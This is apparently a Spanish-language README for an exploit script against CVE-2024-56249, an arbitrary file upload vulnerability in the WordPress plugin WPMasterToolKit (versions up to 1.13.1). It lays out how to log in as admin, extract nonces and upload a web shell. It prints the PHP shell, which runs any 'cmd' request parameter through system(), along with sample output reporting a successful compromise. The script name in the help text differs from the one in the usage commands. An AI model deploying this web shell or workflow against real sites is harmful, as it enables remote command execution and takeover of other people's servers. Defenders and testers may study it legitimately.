
Plugin WPMasterToolKit de WordPress <= 1.13.1 - Vulnerabilidad de subida de archivos arbitraria
Este script explota una vulnerabilidad de subida arbitraria de archivos en el plugin WPMasterToolKit de WordPress, permitiendo a un atacante subir un web shell al servidor. La vulnerabilidad existe en versiones <= 1.13.1 del plugin.
Para explotar esta vulnerabilidad, usa el siguiente comando:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: URL de WordPress objetivo (p. ej., http://192.168.100.74:888/wordpress)-un / --username: Nombre de usuario administrador de WordPress-p / --password: Contraseña del administrador de WordPress-fp / --filepath: Ruta de subida del archivo (por defecto: wp-content/uploads/2025/03)-fn / --filename: Nombre del archivo a subir (por defecto: shell.php)El script comienza probando la URL objetivo para verificar si es vulnerable a CVE-2024-56249 comprobando la versión del plugin WPMasterToolKit.
A continuación, intenta iniciar sesión en el panel de administración de WordPress utilizando las credenciales proporcionadas.
Tras un inicio de sesión exitoso, el script extrae los tokens de seguridad necesarios (nonce y token) requeridos para la subida de archivos.
Sube el archivo especificado (p. ej., un web shell) al servidor objetivo usando los tokens extraídos.
Finalmente, el script verifica si el archivo se ha subido correctamente comprobando su accesibilidad a través de la URL objetivo.
Asegúrate de que el archivo shell (p. ej., shell.php) esté ubicado en el mismo directorio que el script antes de ejecutarlo. Esto es necesario para que el script pueda localizar y subir el archivo correctamente.
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
Esta herramienta está destinada únicamente a fines educativos. Úsala bajo tu propio riesgo. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.
Script de exploit por Nxploit | Khaled Alenazi